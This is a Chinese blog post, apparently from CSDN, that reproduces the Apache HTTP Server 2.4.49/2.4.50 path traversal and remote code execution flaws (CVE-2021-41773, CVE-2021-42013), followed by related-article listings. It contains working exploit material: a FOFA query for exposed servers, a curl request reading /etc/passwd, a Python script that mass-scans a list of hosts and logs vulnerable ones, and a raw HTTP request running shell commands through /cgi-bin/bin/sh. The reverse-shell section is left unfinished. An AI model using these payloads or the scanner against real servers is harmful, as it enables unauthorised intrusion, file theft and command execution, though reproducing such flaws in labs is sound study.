Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行)

最新推荐文章于 2025-03-01 17:50:23 发布
最新推荐文章于 2025-03-01 17:50:23 发布
阅读量6k 收藏 13
点赞数 3
分类专栏: 漏洞复现 文章标签: apache CVE-2021-42013 CVE-2021-41773
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/120674911
版权

目录

CVE-2021-41773

漏洞描述

影响版本

漏洞复现

POC

批量检测poc

CVE-2021-42013

影响版本

命令执行

反弹shell 

声明:请勿用于非法入侵,仅供检测与学习!传送门 ——> 中华人民共和国网络安全法

Apache HTTP Server是阿帕奇(Apache)基金会的一款开源网页服务器,可以在大多数电脑操作系统中运行,由于其具有的跨平台性和安全性,被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。

Apache 已发布补丁以解决多个高危安全漏洞,包括其 HTTP 服务器中的路径遍历和文件泄露漏洞(CVE-2021-41773),据称该漏洞正在被广泛利用。Apache 官方发布 2.4.50 修补之后的次日,安全研究人员发现对 CVE-2021-41773 漏洞的修复并不完善,Apache 已确认该问题,并再次发布 2.4.51 版本。

CVE-2021-41773

漏洞描述

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。

fofa查询:server="Apache/2.4.49"

影响版本

  • Apache HTTP Server 2.4.49

漏洞复现

环境搭建可参考:GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground

然后启动docker,执行如下

docker-compose build && docker-compose up -d

访问8080端口

POC

 curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

批量检测poc

import urllib.request
import ssl
from colorama import init

#添加Headers信息
headers = {
     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36',
 }
for ip in open('server=Apache2.4.49.txt','r'):
     ipv = ip.strip('\r\n')
     url = f'{ipv}/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
     #防止ssl报错
     context = ssl._create_unverified_context()
     try:
          re = urllib.request.Request(url=url,headers=headers)
          response = urllib.request.urlopen(re,context=context,timeout=3)
          response = response.read().decode('utf-8')  
          if "root:x:" in str(response):
               print(f"\033[0;31m{url}\033[0m 可能存在漏洞")
               with open('vul.txt','a',encoding='utf-8') as f:
                    f.write(ipv+"\r")
          else:
               print(f"{ipv}不存在漏洞")
     except Exception as w:
          print(f"{ipv}不存在漏洞")

CVE-2021-42013

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

影响版本

  • Apache HTTP Server 2.4.49
  • Apache HTTP Server 2.4.50

命令执行

GET http://172.16.10.102:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 172.16.10.102:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cde5771ac040-gzip"
If-Modified-Since: Sat, 09 Oct 2021 06:18:33 GMT
Connection: close
Content-Length: 43

echo Content-Type: text/plain; echo; 命令

反弹shell 

未完

欢迎加入一起学习

0day)Commvault 路径遍历导致远程代码执行漏洞复现CVE-2025-34028)
iSee857的博客
04-29 379
Commvault Command Center 创新版中存在一个路径遍历漏洞,允许未经身份验证的参与者上传 ZIP 文件,当目标服务器对其进行扩展时,可导致远程代码执行。(CVE-2025-34028)
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4483
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Apache漏洞复现CVE-2021-41773
m0_59151303的博客
08-06 299
漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录允许被访问的的情况下(默认开启),攻击者可利用路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Makboli的博客
07-02 612
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Vulhu [ CVE-2021-42013 ] 漏洞复现
最新发布
m0_65256346的博客
03-01 813
Docker Compose是一个用来方便地管理多个 Docker 容器的工具,Apache HTTP 服务器项目致力于开发和维护用于现代操作系统(包括 UNIX 和 Windows)的开源 HTTP 服务器。CVE-2021-42013 是由于CVE-2021-41773未完全修复而导致的漏洞,攻击者可以利用路径遍历攻击将 URL 映射到由类似 Alias 的指令配置的目录之外的文件。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行
Lanproxy路径遍历漏洞复现
qq_49091880的博客
10-08 1902
0x00 简介 Lanproxy是一种把局域网个人计算机、服务器代理到公共网络上的内网穿透工具,支持 tcp流量转发,可以支持任何 tcp高层协议,可做访问内网网站、本地支付接口调试、 ssh访问、远程桌面等,而且自带wen在线管理面板,添加端口配置十分简单。现在市场上提供类似服务的有花生壳、TeamView、GoToMyCloud等,但是第三方的公共网络服务器必须为第三方支付费用,而且这些服务存在种种限制,此外,由于数据包将通过第三方网络传输,因此对数据安全是一大威胁。 0x01 漏洞概述 Lanp
CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行
LiBai'S BLOG
11-13 9020
https://66.175.213.123/etc/passwd 请求包 GET https://66.175.213.123//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 66.175.213.123 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,applica
[漏洞复现]CVE-2018-7490(路径遍历)
volcano的博客
04-02 2152
受影响版本 uWSGI 2.0.17之前的版本 环境 https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490 或者直接用BUUOJ里的环境 漏洞分析 uWSGI PHP Plugin < 2.0.17没能妥善处理DOCUMENT_ROOT检测的--php-docroot选项,导致攻击者可以通过带有‘…’序列的特制URL请求,恶意查看系统上的任意文件。 开始利用 打开buuoj的靶机,看到 先不使用exp里的payload,试试
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6084
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
[红日安全]Web安全Day4 - SSRF实战攻防
hongrisec的博客
02-25 972
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
探索CVE-2021-41773CVE-2021-42013:深入Apache Log4j的安全漏洞修复
gitblog_00044的博客
03-30 551
探索CVE-2021-41773CVE-2021-42013:深入Apache Log4j的安全漏洞修复 去发现同类优质开源项目:https://gitcode.com/ 在软件安全领域,CVE(Common Vulnerabilities and Exposures)编号是用于识别特定安全漏洞的标准。近年来,Apache Log4j中的两个重大漏洞CVE-2021-41773CVE-202...
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 1156
CVE-2021-41773 漏洞复现
TryHackMe-CVE-2021-41773/42013Apache2.4.49/50)
M1n9K1n9的博客
02-27 395
tryhackme:在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可以成功。此外(原文如此)此缺陷可能会泄露 CGI 脚本等解释文件的来源。众所周知,这个问题在野外被利用。此问题仅影响 Apache 2.4.49,而不影响早期版本。仅仅 2 天后,即 10月 7 日,一个新的 CVE 发布,引用了之前的 CVE
Apache漏洞CVE-2021-41773
qq_68186313的博客
08-07 307
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)3、在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令。
ApacheCVE-2021-41773漏洞
网安小白
08-06 306
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现
daxi0ng的博客
10-11 2047
0x00 简介 Apache HTTP ServerHTTPd)是Apache软件基金会的一个开放源代码的网页服务器。 0x01 漏洞概述 Apache HTTP Server目录遍历漏洞CVE-2021-41773 影响版本:Apache HTTP Server 2.4.49 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文...
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 7131
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
整理网上的关于 路径遍历漏洞
weixin_34013044的博客
12-03 1068
路径遍历漏洞:文件名可以在客户端任意更改,同时利用服务器的特性,如../进行目录回溯,造成越权访问敏感数据,比如访问../../../etc/passwd存在:一般存在于 文件读取或者图片展示这样的 通过参数提交上来文件名 的功能块上。防护:因此,过滤交互数据时完全有必要的目录遍历漏洞 同时实现了跨目录访问和越权访问,才能访问敏感文件 转载于:https://www.cnblogs.com/yib...
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值